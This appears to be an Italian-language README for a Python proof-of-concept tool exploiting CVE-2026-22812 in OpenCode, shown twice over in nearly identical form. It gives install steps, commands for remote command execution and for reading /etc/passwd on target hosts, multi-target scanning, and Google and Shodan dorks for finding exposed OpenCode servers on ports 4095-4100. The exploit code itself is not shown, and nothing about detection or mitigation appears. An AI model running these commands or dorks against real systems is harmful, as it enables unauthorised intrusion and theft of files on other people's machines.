
Strumento Python per verificare e sfruttare CVE-2026-22812 in OpenCode, con supporto per esecuzione di comandi, lettura di file e scansione multi-target sulle porte 4095-4100.
OpenCode CVE-2026-22812 Exploiter Semplici strumenti Python per verificare e sfruttare la vulnerabilità OpenCode (CVE-2026-22812).
Installazione
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Utilizzo di Base
# Controlla un singolo target
python rce.py -u http://target:4096 --check
# Esegui un comando
python rce.py -u http://target:4096 -c "whoami"
# Leggi un file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scansiona più target
python rce.py -l targets.txt --check
# Altro
python rce.py --help
Dork di Ricerca
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Porte Predefinite: 4095-4100
Strumenti Python semplici per controllare e sfruttare la vulnerabilità OpenCode (CVE-2026-22812).
Installazione:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Utilizzo di Base
# Controlla un singolo target
python rce.py -u http://target:4096 --check
# Esegui un comando
python rce.py -u http://target:4096 -c "whoami"
# Leggi un file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scansiona più target
python rce.py -l targets.txt --check
# Altro
Dork di Ricerca:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Porte Predefinite: 4095-4100